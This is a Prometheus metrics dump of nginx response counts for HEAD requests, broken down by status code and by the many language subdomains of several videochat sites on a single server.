nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ne.videochat.mx"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ne.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ne.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ne.videochat.world"} 65 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="nl.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="nl.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="nl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="nl.videochat.show"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="nl.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="nl.videochat.world"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="no.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="no.videochat.date"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="no.videochat.mx"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="no.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="no.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="no.videochat.world"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pa.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pa.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pa.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pa.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pa.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pap.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pap.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pap.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pap.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pap.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pl.videochat.cafe"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pl.videochat.date"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pl.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pl.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pl.videochat.world"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pt.videochat.cafe"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pt.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pt.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pt.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="pt.videochat.world"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ro.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ro.videochat.date"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ro.videochat.mx"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ro.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ro.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sco.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sco.videochat.mx"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sco.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sco.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sco.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="si.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="si.videochat.show"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="si.videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="si.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sk.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sk.videochat.date"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sk.videochat.mx"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sk.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sk.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sk.videochat.world"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sl.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sl.videochat.date"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sl.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sl.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sl.videochat.world"} 62 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sr.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sr.videochat.date"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sr.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sr.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sr.videochat.world"} 99 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="su.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="su.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="su.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="su.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sv.videochat.cafe"} 79 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sv.videochat.date"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sv.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sv.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sv.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sw.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sw.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sw.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sw.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="sw.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ta.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ta.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ta.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="te.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="te.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="te.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="te.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="te.videochat.world"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="test.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tg.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tg.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tg.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tg.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tg.videochat.world"} 48 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="th.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="th.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="th.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="th.videochat.world"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tl.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tl.videochat.date"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tl.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tl.videochat.world"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tr.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tr.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tr.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tt.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tt.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tt.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tt.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="tt.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uavnrde.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="udm.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="udm.videochat.mx"} 138 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="udm.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="udm.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uk.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uk.videochat.date"} 61 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uk.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uk.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ur.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ur.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="ur.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uz.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uz.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uz.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="uz.videochat.world"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="vi.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="vi.videochat.date"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="vi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="vi.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="vi.videochat.tv.br"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="vi.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="videochat.cafe"} 2457 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="videochat.date"} 2753 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="videochat.mx"} 3014 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="videochat.show"} 2420 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="videochat.tv.br"} 2500 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="videochat.world"} 3428 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="vmi460104.contaboserver.net"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="www.videochat.cafe"} 98 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="www.videochat.date"} 153 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="www.videochat.mx"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="www.videochat.show"} 117 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="www.videochat.world"} 170 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="xh.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="xh.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="xh.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="xh.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="xh.videochat.world"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="xrmjgmi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="yi.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="yi.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="yi.videochat.mx"} 157 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="yi.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="yi.videochat.tv.br"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="yi.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="zh.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="zh.videochat.date"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="zh.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="zh.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="zh.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="404",vhost="zh.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="be.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="cs.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="cs.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="es.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="eu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="fa.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="fa.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="he.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="he.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="hr.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="hu.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="id.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="jp.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ka.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="km.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="kn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ky.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="lo.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="lt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="lv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="lv.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="mk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ml.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="mn.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="mr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="mrj.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="mt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="my.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ne.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ne.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="nl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pap.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pap.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pl.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pl.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pl.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="pt.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="sl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="sl.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="sr.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="sr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="sv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="sw.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="te.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="tg.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="th.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="tl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="tl.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="tt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="uk.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ur.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="ur.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="uz.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="uz.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="videochat.mx"} 41 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="videochat.tv.br"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="videochat.world"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="499",vhost="www.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="502",vhost="videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="161.97.120.25"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="3.0.3"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="5.7.31-0ubuntu0.18.04.1"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="af.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="af.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="al.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="am.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ar.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="az.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="az.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ba.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ba.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ba.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="be.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bg.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bn.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bn.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bn.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bs.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bs.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="bs.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ca.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ceb.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ceb.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="chm.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="cs.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="cs.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="cy.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="da.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="de.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="ee.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="el.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="el.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="en.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="en.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="eo.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="eo.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="et.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="eu.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="eu.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="fa.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="fa.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="fi.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="HEAD",status="503",vhost="fr.videochat.mx"} 3 